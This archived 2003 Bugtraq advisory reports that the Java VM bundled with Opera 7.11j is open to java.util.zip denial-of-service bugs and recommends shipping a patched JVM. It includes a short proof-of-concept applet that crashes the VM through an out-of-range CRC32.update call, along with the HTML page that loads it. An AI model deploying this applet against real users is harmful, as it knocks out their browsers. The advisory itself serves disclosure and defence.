lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <Pine.A41.4.44.0305110101220.52558-100000@zivunix.uni-muenster.de>
Date: Sun, 11 May 2003 01:28:59 +0200 (MES)
From: Marc Schoenefeld <schonef@...-muenster.de>
To: bugtraq@...urityfocus.com
Subject: Opera 7.11 java.util.zip.* Vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

 the just released Opera 7.11j comes with a java vm (1.4.1_01)
 that is vulnerable to the java.util.zip.* bugs
 that can cause denial of service via Java Applets
 like the one with source printed below.
 Therefore my suggestion towards the Opera deployment
 team is to bundle java 1.4.1_02 which is not vulnerable
 to the java.util.zip-Bugs.
 All 1.3.1 versions are still vulnerable !
 If you already installed java 1.4.1_02 prior to
 installing Opera you are not vulnerable, because
 the most current jvm seems to be chosen by opera
 when running applets.
 If you are interested in the details (not opera-specific),
 read the whole story at www.illegalaccess.org or read:

http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
http://developer.java.sun.com/developer/bugParade/bugs/4811917.html

Sincerely
Marc Schoenefeld


The applet code:
========CRCApplet.java=======================
 import java.applet.Applet;
import java.awt.Graphics;

public class CRCApplet extends Applet{
public void paint(Graphics g) {
	 (new java.util.zip.CRC32()).update(new
byte[0],Integer.MAX_VALUE-3,4);
}
}
=============================================

The corresponding HTML
=======CRCApplet.html======================
|html>
|body>
|applet code=CRCApplet.class width=400 height=400>
|/applet>
|/body>
|/html>
===========================================


- --

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (AIX)
Comment: For info see http://www.gnupg.org

iD8DBQE+vYs/qCaQvrKNUNQRAqWUAJ9tdtt9uOboP2fq+/ZqhRqE8Fet7gCfffsD
nBk6PscPB5WQYpqgZaItaDw=
=uUS/
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ